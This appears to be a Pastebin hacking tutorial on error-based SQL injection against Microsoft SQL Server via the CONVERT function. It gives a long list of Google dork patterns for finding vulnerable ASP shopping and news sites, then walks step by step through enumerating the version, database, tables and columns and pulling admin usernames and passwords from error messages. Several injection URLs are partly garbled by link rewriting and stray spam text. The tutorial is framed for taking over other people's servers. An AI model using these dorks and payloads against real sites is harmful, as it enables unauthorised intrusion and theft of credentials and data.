Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- I hope u will enjoy it....
- Lets start...
- There are various types of sql injection for MICROSOFT here as follows
- 1)ODBC Error Message Attack with "CONVERT"
- 2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
- 3)MSSQL Injection with UNION Attack
- 4)MSSQL Injection in Web Services (SOAP Injection)
- 5)MSSQL Blind SQL Injection Attack
- I will be explaining various methods of sqli's in my various tuts..
- So for now we will start with easiest methode of sqli with CONVERT
- STEP 1:
- First we need to find a vulnerable site.
- By adding a single quote (') double quote ("") or a semicolon (DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm to the field under test.
- eg
- IANA — Example domains'
- IANA — Example domains
- It's vulnerable in SQL injection,If the output shows some error like this:
- [HTTP Response]------------------------------------------------------------------------------
- Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
- [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
- character string ''.
- /news.asp, line 52
- [End HTTP Response]-------------------------------------------------------------------------
- Also error could be something like below
- Microsoft OLE DB Provider for SQL Server error '80040e14 '
- Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
- ..../ main_rub.asp, line 4
- If the errors like above are shown then site could be vulnerable in SQL
- Also you can find vulnerable site from google dork.
- eg
- inurlDuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAmage.asp?id=
- inurl:index.asp?sid=
- Code:
- ".asp?bookID="
- ".asp?cart="
- ".asp?cartID="
- ".asp?catalogid="
- ".asp?category_list="
- ".asp?CategoryID="
- ".asp?catID="
- ".asp?cid="
- ".asp?code_no="
- ".asp?code="
- ".asp?designer="
- ".asp?framecode="
- ".asp?id="
- ".asp?idcategory="
- ".asp?idproduct="
- ".asp?intCatalogID="
- ".asp?intProdId="
- ".asp?item_id="
- ".asp?item="
- ".asp?itemID="
- ".asp?maingroup="
- ".asp?misc="
- ".asp?newsid="
- ".asp?order_id="
- ".asp?p="
- ".asp?pid="
- ".asp?ProdID="
- ".asp?product_id="
- ".asp?product="
- ".asp?productid="
- ".asp?showtopic="
- ".asp?Sku="
- ".asp?storeid="
- ".asp?style_id="
- ".asp?StyleID="
- ".asp?userID="
- "about.asp?cartID="
- "accinfo.asp?cartId="
- "acclogin.asp?cartID="
- "add.asp?bookid="
- "add_cart.asp?num="
- "addcart.asp?"
- "addItem.asp"
- "add-to-cart.asp?ID="
- "addToCart.asp?idProduct="
- "addtomylist.asp?ProdId="
- "adminEditProductFields.asp?intProdID="
- "advSearch_h.asp?idCategory="
- "affiliate.asp?ID="
- "affiliate-agreement.cfm?storeid="
- "affiliates.asp?id="
- "ancillary.asp?ID="
- "archive.asp?id="
- "article.asp?id="
- "aspx?PageID"
- "basket.asp?id="
- "Book.asp?bookID="
- "book_list.asp?bookid="
- "book_view.asp?bookid="
- "BookDetails.asp?ID="
- "browse.asp?catid="
- "browse_item_details.asp"
- "Browse_Item_Details.asp?Store_Id="
- "buy.asp?"
- "buy.asp?bookid="
- "bycategory.asp?id="
- "cardinfo.asp?card="
- "cart.asp?action="
- "cart.asp?cart_id="
- "cart.asp?id="
- "cart_additem.asp?id="
- "cart_validate.asp?id="
- "cartadd.asp?id="
- "cat.asp?iCat="
- "catalog.asp"
- "catalog.asp?CatalogID="
- "catalog_item.asp?ID="
- "catalog_main.asp?catid="
- "category.asp"
- "category.asp?catid="
- "category_list.asp?id="
- "categorydisplay.asp?catid="
- "checkout.asp?cartid="
- "checkout.asp?UserID="
- "checkout_confirmed.asp?order_id="
- "checkout1.asp?cartid="
- "comersus_listCategoriesAndProducts.asp?idCate gory ="
- "comersus_optEmailToFriendForm.asp?idProduct="
- "comersus_optReviewReadExec.asp?idProduct="
- "comersus_viewItem.asp?idProduct="
- "comments_form.asp?ID="
- "contact.asp?cartId="
- "content.asp?id="
- "customerService.asp?TextID1="
- "default.asp?catID="
- "description.asp?bookid="
- "details.asp?BookID="
- "details.asp?Press_Release_ID="
- "details.asp?Product_ID="
- "details.asp?Service_ID="
- "display_item.asp?id="
- "displayproducts.asp"
- "downloadTrial.asp?intProdID="
- "emailproduct.asp?itemid="
- "emailToFriend.asp?idProduct="
- "events.asp?ID="
- "faq.asp?cartID="
- "faq_list.asp?id="
- "faqs.asp?id="
- "feedback.asp?title="
- "freedownload.asp?bookid="
- "fullDisplay.asp?item="
- "getbook.asp?bookid="
- "GetItems.asp?itemid="
- "giftDetail.asp?id="
- "help.asp?CartId="
- "home.asp?id="
- "index.asp?cart="
- "index.asp?cartID="
- "index.asp?ID="
- "info.asp?ID="
- "item.asp?eid="
- "item.asp?item_id="
- "item.asp?itemid="
- "item.asp?model="
- "item.asp?prodtype="
- "item.asp?shopcd="
- "item_details.asp?catid="
- "item_list.asp?maingroup"
- "item_show.asp?code_no="
- "itemDesc.asp?CartId="
- "itemdetail.asp?item="
- "itemdetails.asp?catalogid="
- "learnmore.asp?cartID="
- "links.asp?catid="
- "list.asp?bookid="
- "List.asp?CatID="
- "listcategoriesandproducts.asp?idCategory="
- "modline.asp?id="
- "myaccount.asp?catid="
- "news.asp?id="
- "order.asp?BookID="
- "order.asp?id="
- "order.asp?item_ID="
- "OrderForm.asp?Cart="
- "page.asp?PartID="
- "payment.asp?CartID="
- "pdetail.asp?item_id="
- "powersearch.asp?CartId="
- "price.asp"
- "privacy.asp?cartID="
- "prodbycat.asp?intCatalogID="
- "prodetails.asp?prodid="
- "prodlist.asp?catid="
- "product.asp?bookID="
- "product.asp?intProdID="
- "product_info.asp?item_id="
- "productDetails.asp?idProduct="
- "productDisplay.asp"
- "productinfo.asp?item="
- "productlist.asp?ViewType=Category&CategoryID= "
- "productpage.asp"
- "products.asp?ID="
- "products.asp?keyword="
- "products_category.asp?CategoryID="
- "products_detail.asp?CategoryID="
- "productsByCategory.asp?intCatalogID="
- "prodView.asp?idProduct="
- "promo.asp?id="
- "promotion.asp?catid="
- "pview.asp?Item="
- "resellers.asp?idCategory="
- "results.asp?cat="
- "savecart.asp?CartId="
- "search.asp?CartID="
- "searchcat.asp?search_id="
- "Select_Item.asp?id="
- "Services.asp?ID="
- "shippinginfo.asp?CartId="
- "shop.asp?a="
- "shop.asp?action="
- "shop.asp?bookid="
- "shop.asp?cartID="
- "shop_details.asp?prodid="
- "shopaddtocart.asp"
- "shopaddtocart.asp?catalogid="
- "shopbasket.asp?bookid="
- "shopbycategory.asp?catid="
- "shopcart.asp?title="
- "shopcreatorder.asp"
- "shopcurrency.asp?cid="
- "shopdc.asp?bookid="
- "shopdisplaycategories.asp"
- "shopdisplayproduct.asp?catalogid="
- "shopdisplayproducts.asp"
- "shopexd.asp"
- "shopexd.asp?catalogid="
- "shopping_basket.asp?cartID="
- "shopprojectlogin.asp"
- "shopquery.asp?catalogid="
- "shopremoveitem.asp?cartid="
- "shopreviewadd.asp?id="
- "shopreviewlist.asp?id="
- "ShopSearch.asp?CategoryID="
- "shoptellafriend.asp?id="
- "shopthanks.asp"
- "shopwelcome.asp?title="
- "show_item.asp?id="
- "show_item_details.asp?item_id="
- "showbook.asp?bookid="
- "showStore.asp?catID="
- "shprodde.asp?SKU="
- "specials.asp?id="
- "store.asp?id="
- "store_bycat.asp?id="
- "store_listing.asp?id="
- "Store_ViewProducts.asp?Cat="
- "store-details.asp?id="
- "storefront.asp?id="
- "storefronts.asp?title="
- "storeitem.asp?item="
- "StoreRedirect.asp?ID="
- "subcategories.asp?id="
- "tek9.asp?"
- "template.asp?Action=Item&pid="
- "topic.asp?ID="
- "tuangou.asp?bookid="
- "type.asp?iType="
- "updatebasket.asp?bookid="
- "updates.asp?ID="
- "view.asp?cid="
- "view_cart.asp?title="
- "view_detail.asp?ID="
- "viewcart.asp?CartId="
- "viewCart.asp?userID="
- "viewCat_h.asp?idCategory="
- "viewevent.asp?EventID="
- "viewitem.asp?recor="
- "viewPrd.asp?idcategory="
- "ViewProduct.asp?misc="
- "voteList.asp?item_ID="
- "whatsnew.asp?idCategory="
- "WsAncillary.asp?ID="
- "WsPages.asp?ID="
- STEP 2:
- Now we got our vulnerable website.
- CONVERT command is used to convert between two data types and when the specific
- data cannot convert to another type the error will be returned.
- Now we start with our assessment by finding MSSQL_Version, DB_name.
- IANA — Example domains
- [http response]-------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
- (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
- Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
- /includes/templates/header.asp, line 21
- -----------------------------------------------------------
- We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)
- Let's go to enumerate DB_name.
- IANA — Example domains
- [http response]--------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'IPC' to data type int.
- /includes/templates/header.asp, line 21
- ------------------------------------------------------------
- The data base name is IPC.
- IANA — Example domains
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'ipcdc' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- The use operating database is ipcdc....
- STEP 3:
- NOW LETS FIND TABLES IN DATABASE
- IANA — Example domains e_name+from+information_schema.tables))--
- "information_schema.tables" stores information about tables in databases and there is a field called "table_name"
- which stores names of each table."SELECT TOP 1" will show first table in database.
- The result of this request is something like this:
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
- We only put WHERE clause append the query in above request.
- IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- Second table 'headerGraphic'
- IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'admin' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- third table 'admin'
- Like this you will get each table name from the error.
- IANA — Example domains e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
- If the query returns something like this.
- [http response]----------------------------------------
- ADODB.Field error '800a0bcd'
- Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
- /page.asp, line 22
- -----------------------------------------------------------------
- IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.
- STEP 4:
- Now we are all set.....and we will find columns in admin table
- We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
- but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
- IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'username' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- IANA — Example domains mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
- the response will be
- [http response]----------------------------------------
- Microsoft OLE DB Provider for SQL Server error '80040e07'
- Conversion failed when converting the nvarchar value 'passwd' to data type int.
- /includes/templates/header.asp, line 21
- -------------------------------------------------------------
- So 2nd column is 'passwd'
- DO THIS LIKE WE DID URL MANIPULATION FOR TABLES....
- DONT FORGET TO ADD WHERE CLAUSE.
- UNTILL U GET ERROR LIKE THIS
- [http response]----------------------------------------
- ADODB.Field error '800a0bcd'
- Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
- /page.asp, line 22
- -----------------------------------------------------------------
- STEP 5: RETRIEVING USENAME n PASSWORD etc
- Now lets see what we got from above
- table_name: 'admin','siteStatus' n 'HeaderGraphic'
- Here we are interestedin 'admin'.So we found columns fo 'admin'
- column_name:'username' n 'passwd'
- LETS do our work now
- IANA — Example domains name+from+admin))--
- You will get first username in terms of error
- eg sa_admin
- IANA — Example domains wd+from+admin))--
- You will get passwd.
- eg comic123
- So u own .....MSSQL server wid
- USERNAME: sa_admin
- PASSWORD:comic123
- [note:
- 1) you can use AND/OR both
- 2) Dnt forget , (comma) after 'int' in convert()
- 3) In error after ' (upper comma) is your table_name of column_name or etc
- 4)you can enemerate more usernames n passwords by using 'not' command
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement